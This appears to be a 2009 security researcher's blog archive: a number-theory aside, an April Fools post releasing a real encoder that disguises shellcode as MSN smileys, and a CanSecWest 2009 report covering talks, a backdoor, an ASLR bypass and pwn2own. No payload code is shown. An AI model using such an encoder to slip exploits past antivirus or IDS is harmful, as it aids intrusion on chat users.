Now what about an integer being preceded by a cube and followed by a square? If Wikipedia is right there is no integer solution to b^3=a^2-2. Well there is actually one trivial solution (b=-1 and a=+-1), so Wikipedia is wrong, but is it the only solution? We could be tempted to follow a similar approach, let s' be sqrt(2) and use Z[s'], which is also a ring. But -1 and 1 are not the only units: s-1 and s+1 are also units since (s'-1)(s'+1)=1 and so we have an infinite number of units written +-(s'-1)^m and +-(s'+1)^m.
Moreover, is Z[s'] still a unique factorization domain ? Not sure. But you may have to find out if you want to prove 0 is the only number preceded by a cube and followed by a square (for example to celebrate your 0-aged new born baby).

Wednesday, April 1, 2009

Massive exploitation of instant messaging applications proved feasible

EDIT: While most realized this was an April fool's joke, only a few figured out that it was also a genuine smiley shellcode encoder. However, the security implications are of course non existent. And we have been slashdoted!

Yoann Guillot and myself have been assessing the security of instant communication applications for a couple of years.
For quite some time now, we have both suspected that it was possible to conduct both stealth and massive attacks on popular chat clients such as MSN, AIM, Trillian or mIRC.

Today, we have verified our intuition by creating an encoder that can make any shellcode look like a smiley. It is possible to encode malicious shellcodes in emoticons, leaving exploits indistinguishable from genuine chat messages.

This would make massive attacks against instant messaging applications impossible to catch by anti-virus, IDS or similar signature based technologies. Moreover, it is possible to conduct attacks with plausible deniability.

The potential for mass exploitation is undeniable. We are urging Microsoft, AOL and other administrators of popular chat networks to ban smileys (especially animated ones) until all the consequences of this attack have been understood. Twitter and Facebook are likely vulnerable too, although we didn't conduct specific research yet on those networks.

This proof of concept program will compile the sample included shellcode, encode it into a valid MSN smiley and compile a test C program by using metasm. While the example shellcode and the compiled test program are both targeting Linux, you can supply any shellcode you want, including a Windows one, via the command line.

Please, use as follow:

"apt-get install libc6-dev-i386 mercurial ruby" if required
"hg clone"
"cd metasm"
put smile.rb in the metasm directory
"ruby ./smile.rb"

Sunday, March 29, 2009

CanSecWest 2009 report

I am back from CanSecWest. Like every year, it was interesting and great fun. And for the first year, presentation material has been put online in a matter of days!

I would definitely recommend to check out the following talks:
  • Immunity's talk about exploiting bugs smoothly, without unwanted side effects. Interesting, but this talk could have used a few real-world examples.
  • Loic Duflot's talk about attacking SMM via CPU cache poisoning. Something that has apparently been independantly discovered a few months later by Joanna. Be sure to attend the follow-up talk at SSTIC if you can understand French!
  • Halvar's talk about static binary analysis and the accompanying paper. Yes, he really does binary-level abstract interpretation.
  • Matt Miller (skape) and Tim Burrell's talk about the evolution of exploit mitigation in Microsoft's products. Some insight about what has been done and what may be done in the future. A good way to check that you're still up-to-date.
  • Microsoft's Jason Shirk and Dave Weinstein presentation about their !exploitable crash analyser.
  • Alexander Sotirov and Mike Zusman's talk about EV certificates. The general idea is based on Adam Barth and Collin Jackson’s paper which showed how browsers fail to draw a clear barrier between EV SSL and non-EV SSL, including when applying the same origin policy. This is expected behavior since both are served under the https:// scheme, but the result is that EV is, as currently implemented, useless against MITM attacks (but still useful against fishing attacks). Alexander and Mike showed various ways of exploiting this, and with cool demos!
There were other good talks, such as Andrea and Daniele's on power line leakage (very entertaining, but a bit less than last year's talk).

Nevertheless, this year I've been quite disappointed with the lightning talks, only a handful of peoples bothered giving one. Most probably, most wanted to run to Grouse Mountain quickly for the awesome party!

  • The highlight of the lightning talks was someone showing relationship between old school and nowadys' technologies (finger <-> twitter, talk <-> chat etc..), with cool pure ASCII slides.
  • Philippe Biondi talked about stateful protocol modelization in Scapy (with a TCP example).
  • Raphaël Rigo presented his Nintendo DS Wifi scanner.
  • Tavis Ormandy and I talked about bypassing Linux' recent hiding of /proc/pid/maps file to make ASLR useful locally. The idea is to monitor the stack and instruction pointers in /proc/pid/stat to infer the address space layout (Tavis wrote cool PoC code for this!). Funny to see info leaking prevention done wrong 6 years after grsecurity and PaX+obs did it right.
  • I presented my subtty backdoor.
  • Charlie Miller told us how bad it is to report bugs for free. I wonder if he might be biased on this.
Another interesting event was the 2009 edition of pwn2own. Everything exciting happened on day 1, since not many peoples were interested in the phone challenges and those who were had been annoyed by the lack of specifications before the challenge and couldn't get ready on time.

Charlie Miller owned Safari, Nils owned Safari, Firefox and IE8 and I owned Safari and Firefox. For those of you who are asking, I actually paired with someone (more information on this in a later post) and we didn't qualify for a price because the vulnerabilities had already been reported.
The reason for competing was that technically this would still qualify to keep the machine (and also, I must admit, because it's always fun to pop some shells). Though, Charlie was lucky and was the first to give a try (I was second) and so kept the Mac.
Well, I guess that's what you get for not being good researchers and not sitting on issues ;)

On Friday, many peoples left for Whistler for a great ski trip and further interesting security discussions. It was the perfect sequel to a great CanSecWest edition!

Sunday, March 22, 2009

Blog boot!

I have finally decided to open a blog. I am not exactly an early adopter, it took me a long time to feel the need of having one.
IT security is a long-time interest for me. I've usually been sharing thoughts, ideas and opinions in bars, restaurants and conferences or on IRC. I'll use this blog to reach a broader audience.
To publish new tools, I hope it will be more user-friendly than raw updates to

So, here's my first post from Whistler, Canada, just after the CanSecWest security conference!